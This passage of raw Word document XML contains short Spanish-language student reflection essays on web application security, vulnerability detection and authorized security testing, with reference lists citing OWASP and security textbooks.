          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fischer, F., Xiao, H., Kao, C., Stachelscheid, Y., Johnson, B., &amp; Rodeghero, P. (2020). Stack Overflow Considered Helpful! Deep Learning Security Nudges Towards Stronger Cryptography. In Proceedings of the 29th USENIX Security Symposium. 339--356.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6685A6" w14:textId="629448F9" w:rsidR="00737B42" w:rsidRPr="00B52F07" w:rsidRDefault="00737B42" w:rsidP="001844ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:sectPr w:rsidR="00737B42" w:rsidRPr="00B52F07" w:rsidSect="00737B42">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:num="2" w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="00C65DED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">McGraw, G. (2016). Software Security: Building Security In. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Addison-Wesley Professional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07421E83" w14:textId="2AE461A0" w:rsidR="001844ED" w:rsidRPr="001844ED" w:rsidRDefault="001844ED" w:rsidP="001844ED">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001844ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Reflexión sobre las Brechas de Seguridad en las Aplicaciones Web: Un Riesgo Subestimado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E993EBE" w14:textId="77777777" w:rsidR="001844ED" w:rsidRPr="001844ED" w:rsidRDefault="001844ED" w:rsidP="001844ED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001844ED">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Autor Quispe Ticona Jhoel Debray</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2808A683" w14:textId="77777777" w:rsidR="001844ED" w:rsidRPr="001844ED" w:rsidRDefault="001844ED" w:rsidP="001844ED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001844ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Resumen</w:t>
      </w:r>
      <w:r w:rsidRPr="001844ED">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Las aplicaciones web, esenciales en diversos sectores, enfrentan riesgos constantes debido a brechas de seguridad. Este artículo reflexiona sobre sus causas técnicas y culturales, y subraya la importancia de integrar la seguridad desde el diseño.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE8BEDD" w14:textId="77777777" w:rsidR="001844ED" w:rsidRPr="001844ED" w:rsidRDefault="001844ED" w:rsidP="001844ED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001844ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Palabras clave</w:t>
      </w:r>
      <w:r w:rsidRPr="001844ED">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Seguridad web, brechas de seguridad, cultura de seguridad, desarrollo seguro, riesgos digitales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EF04DD" w14:textId="77777777" w:rsidR="001844ED" w:rsidRPr="001844ED" w:rsidRDefault="001844ED" w:rsidP="001844ED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001844ED">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>La transformación digital ha expandido el uso de aplicaciones web, pero también ha aumentado los riesgos de seguridad asociados a ellas. Cada vez más organizaciones dependen de aplicaciones para gestionar datos críticos, lo que convierte a la seguridad en una prioridad ineludible. Brechas como inyecciones SQL, validaciones inadecuadas o errores de configuración no solo responden a fallos técnicos, sino también a presiones comerciales y a la falta de una cultura de seguridad bien consolidada. La omisión de buenas prácticas por priorizar la rapidez de entrega expone a las aplicaciones a ataques que comprometen la integridad, disponibilidad y confidencialidad de los datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799A97BB" w14:textId="77777777" w:rsidR="001844ED" w:rsidRPr="001844ED" w:rsidRDefault="001844ED" w:rsidP="001844ED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001844ED">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>La seguridad debe ser incorporada desde la fase de diseño mediante estrategias como "Security by Design", auditorías de código y capacitación continua de los equipos de desarrollo. Este cambio de mentalidad implica entender que la protección de datos no es un extra opcional, sino un componente fundamental del producto digital. Además, resulta crucial fomentar una cultura organizacional donde la seguridad sea responsabilidad compartida entre todas las áreas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABBCE1B" w14:textId="77777777" w:rsidR="001844ED" w:rsidRPr="001844ED" w:rsidRDefault="001844ED" w:rsidP="001844ED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001844ED">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>La calidad del software debe medirse también por su resiliencia ante amenazas, no solo por su funcionalidad o rapidez de entrega. En este sentido, las pruebas de penetración, la actualización constante de las tecnologías utilizadas y la adopción de estándares reconocidos como OWASP Top Ten pueden ser aliados clave para mejorar la postura de seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DEAE4F" w14:textId="77777777" w:rsidR="001844ED" w:rsidRPr="001844ED" w:rsidRDefault="001844ED" w:rsidP="001844ED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001844ED">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En conclusión, las brechas de seguridad web reflejan decisiones organizacionales, prácticas de desarrollo y niveles de conciencia sobre los riesgos. Asumir la seguridad como responsabilidad ética y estratégica no solo minimiza la exposición a ataques, sino que también fortalece la confianza de los usuarios y protege la reputación de las organizaciones. En un ecosistema digital en constante evolución, construir con seguridad es, más que nunca, un acto de responsabilidad y visión a largo plazo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D1F7FF" w14:textId="6DC05896" w:rsidR="001844ED" w:rsidRPr="001844ED" w:rsidRDefault="001844ED" w:rsidP="001844ED">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:sectPr w:rsidR="001844ED" w:rsidRPr="001844ED" w:rsidSect="001844ED">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:num="2" w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11B81D43" w14:textId="77777777" w:rsidR="001844ED" w:rsidRPr="006C3776" w:rsidRDefault="001844ED" w:rsidP="001844ED">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C3776">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Artículo de David Andres Soliz Alvarez:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F474278" w14:textId="77777777" w:rsidR="001844ED" w:rsidRPr="006C3776" w:rsidRDefault="001844ED" w:rsidP="001844ED">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C3776">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>La Importancia Crítica de la Detección de Vulnerabilidades en Aplicaciones Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCDD919" w14:textId="77777777" w:rsidR="001844ED" w:rsidRPr="006C3776" w:rsidRDefault="001844ED" w:rsidP="001844ED">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C3776">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Resumen:</w:t>
      </w:r>
      <w:r w:rsidRPr="006C3776">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="006C3776">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El crecimiento acelerado de las aplicaciones web ha traído consigo una expansión proporcional de riesgos de seguridad. Este artículo reflexiona sobre la importancia de identificar vulnerabilidades en las primeras etapas del desarrollo, destacando la necesidad de enfoques automatizados para proteger la integridad de los sistemas digitales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330E7650" w14:textId="77777777" w:rsidR="001844ED" w:rsidRPr="006C3776" w:rsidRDefault="001844ED" w:rsidP="001844ED">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C3776">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Reflexión</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDDB9EC" w14:textId="77777777" w:rsidR="001844ED" w:rsidRPr="006C3776" w:rsidRDefault="001844ED" w:rsidP="001844ED">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C3776">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">En el actual ecosistema digital, las aplicaciones web se han convertido en objetivos prioritarios para atacantes, quienes explotan sistemáticamente vulnerabilidades como inyecciones de código, fallas de validación de entradas y debilidades en la autenticación. La </w:t>
      </w:r>
      <w:r w:rsidRPr="006C3776">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>presencia de estos riesgos no solo amenaza la seguridad de los datos, sino también la confianza del usuario y la continuidad de los servicios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71326AEC" w14:textId="77777777" w:rsidR="001844ED" w:rsidRPr="006C3776" w:rsidRDefault="001844ED" w:rsidP="001844ED">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C3776">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ante este panorama, la detección temprana de vulnerabilidades emerge como una estrategia indispensable. Automatizar el análisis de entradas, simular ataques comunes y reportar hallazgos permite identificar fallos antes de que puedan ser explotados. Esto no solo reduce el costo de corrección, sino que fomenta una cultura de desarrollo seguro desde las primeras fases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363CD7EC" w14:textId="77777777" w:rsidR="001844ED" w:rsidRPr="006C3776" w:rsidRDefault="001844ED" w:rsidP="001844ED">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C3776">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Más que una opción técnica, abordar las vulnerabilidades de forma proactiva representa un compromiso ético con la protección de la información y la resiliencia de los sistemas frente a un entorno de amenazas en constante evolución.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573439B2" w14:textId="77777777" w:rsidR="001844ED" w:rsidRPr="006C3776" w:rsidRDefault="001844ED" w:rsidP="001844ED">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C3776">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Palabras clave:</w:t>
      </w:r>
      <w:r w:rsidRPr="006C3776">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerabilidades web, seguridad informática.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663B9597" w14:textId="77777777" w:rsidR="001844ED" w:rsidRDefault="001844ED" w:rsidP="001844ED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:sectPr w:rsidR="001844ED" w:rsidSect="001844ED">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:num="2" w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2023CFAD" w14:textId="09964E04" w:rsidR="001844ED" w:rsidRPr="001844ED" w:rsidRDefault="001844ED" w:rsidP="001844ED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FE07C89" w14:textId="16E6AD28" w:rsidR="001844ED" w:rsidRDefault="001844ED" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A8D8F34" w14:textId="71120756" w:rsidR="001844ED" w:rsidRDefault="001844ED" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BB05CC3" w14:textId="17E37BAF" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D0CB00F" w14:textId="1CA515FF" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12A0A430" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:sectPr w:rsidR="006C3776" w:rsidSect="00737B42">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34FA57F1" w14:textId="058D23BC" w:rsidR="006C3776" w:rsidRPr="00E56439" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E56439">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PRUEBAS PARA APLICACIONES WEB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030C8CB3" w14:textId="77777777" w:rsidR="006C3776" w:rsidRPr="00E56439" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E56439">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Juan Pablo Pillco Mamani</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E56439">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Universidad Autónoma Gabriel René Moreno</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137E61D5" w14:textId="77777777" w:rsidR="006C3776" w:rsidRPr="00E56439" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E56439">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>RESUMEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727BE1B3" w14:textId="77777777" w:rsidR="006C3776" w:rsidRPr="00E56439" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E56439">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>La seguridad en aplicaciones web constituye uno de los pilares fundamentales en el desarrollo de sistemas digitales modernos. Este artículo reflexiona críticamente sobre la importancia de las estrategias, métodos, herramientas y consideraciones éticas necesarias para lograr aplicaciones web más seguras y confiables. Desde las fases iniciales de diseño hasta la implementación final, la seguridad debe ser un proceso dinámico que acompañe cada etapa del ciclo de vida del software. Reflexionar sobre la integración temprana de pruebas, el uso inteligente de herramientas automatizadas, y la constante necesidad de evaluaciones manuales profundas es esencial para enfrentar las amenazas emergentes del entorno digital.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158E7F26" w14:textId="77777777" w:rsidR="006C3776" w:rsidRPr="00E56439" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E56439">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Palabras clave:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E56439">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pruebas de aplicaciones web, Seguridad web, Estrategias de testing, Automatización de pruebas, Detección de vulnerabilidades, OWASP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B096AB" w14:textId="77777777" w:rsidR="006C3776" w:rsidRPr="00E56439" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E56439">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">El vertiginoso crecimiento de las aplicaciones web ha generado </w:t>
      </w:r>
      <w:r w:rsidRPr="00E56439">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>oportunidades y desafíos en igual medida. Cada nueva funcionalidad, cada expansión de un servicio digital, amplía la superficie de ataque expuesta a amenazas. En este contexto, el compromiso con la calidad y la seguridad no puede limitarse a etapas finales del desarrollo. Debe incorporarse desde el primer boceto de arquitectura hasta el último despliegue en producción. Adoptar estrategias como el Shift Left Testing, que promueven la ejecución temprana de pruebas, permite detectar errores de manera precoz y reducir exponencialmente los costos de corrección.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E56439">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E56439">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>La automatización de pruebas ha emergido como una herramienta poderosa. Frameworks como Selenium o herramientas de seguridad como OWASP ZAP y Burp Suite permiten abordar problemas de funcionalidad y vulnerabilidad a gran escala. Sin embargo, una dependencia ciega de estas soluciones sería un error. La creatividad humana, la intuición del tester, sigue siendo un componente irreemplazable, especialmente en pruebas exploratorias donde se descubren fallos no contemplados en planes de prueba rígidos.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E56439">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E56439">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Más allá de las técnicas y herramientas, la ética debe guiar todo proceso de pruebas. Las pruebas deben realizarse siempre con autorización, protegiendo la confidencialidad de los datos y respetando </w:t>
      </w:r>
      <w:r w:rsidRPr="00E56439">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>los derechos de los usuarios. La validación de entradas, la gestión segura de sesiones, y el monitoreo continuo son prácticas que no pueden ser vistas como extras, sino como elementos intrínsecos a cualquier proyecto serio.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E56439">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E56439">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Asegurar una aplicación web es, en última instancia, abrazar una cultura de mejora continua. La seguridad no es un destino, sino un viaje que exige vigilancia, aprendizaje y adaptación constante. Sólo las organizaciones que interioricen esta </w:t>
      </w:r>
      <w:r w:rsidRPr="00E56439">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>mentalidad estarán preparadas para enfrentar los retos de un entorno digital en constante evolución.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F90EB00" w14:textId="77777777" w:rsidR="006C3776" w:rsidRPr="00E56439" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E56439">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>REFERENCIAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4594206A" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:r w:rsidRPr="00E56439">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] Stuttard, D., &amp; Pinto, M. (2011). </w:t>
      </w:r>
      <w:r>
        <w:t>The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws. Wiley.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>[2] The OWASP Foundation. (2023). OWASP Testing Guide v4. Recuperado de https://owasp.org/www-project-testing/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3126C3" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:sectPr w:rsidR="006C3776" w:rsidSect="006C3776">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:num="2" w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EAC4BF0" w14:textId="37C78474" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776"/>
    <w:p w14:paraId="604FA778" w14:textId="6AD89A6E" w:rsidR="006C3776" w:rsidRPr="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7C5553" w14:textId="4694E00D" w:rsidR="001844ED" w:rsidRDefault="004223FE" w:rsidP="004223FE">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc196776214"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>BIBLIOGRAFIA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="4435944D" w14:textId="77777777" w:rsidR="004223FE" w:rsidRDefault="004223FE" w:rsidP="004223FE">
      <w:pPr>
        <w:spacing w:after="253" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cisco Security Research. (2023). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Relationship between load testing and security vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:t>. Cisco Press.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56871C46" w14:textId="77777777" w:rsidR="004223FE" w:rsidRDefault="004223FE" w:rsidP="004223FE">
      <w:pPr>
        <w:spacing w:after="215"/>
        <w:ind w:right="12"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Clarke, J. (2020). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>SQL injection attacks and defense</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (2a ed.). Syngress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18549328" w14:textId="77777777" w:rsidR="004223FE" w:rsidRDefault="004223FE" w:rsidP="004223FE">
      <w:pPr>
        <w:spacing w:after="253" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gartner. (2023). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Web application security market report</w:t>
      </w:r>
      <w:r>
        <w:t>. Gartner Research.</w:t>
      </w:r>
    </w:p>
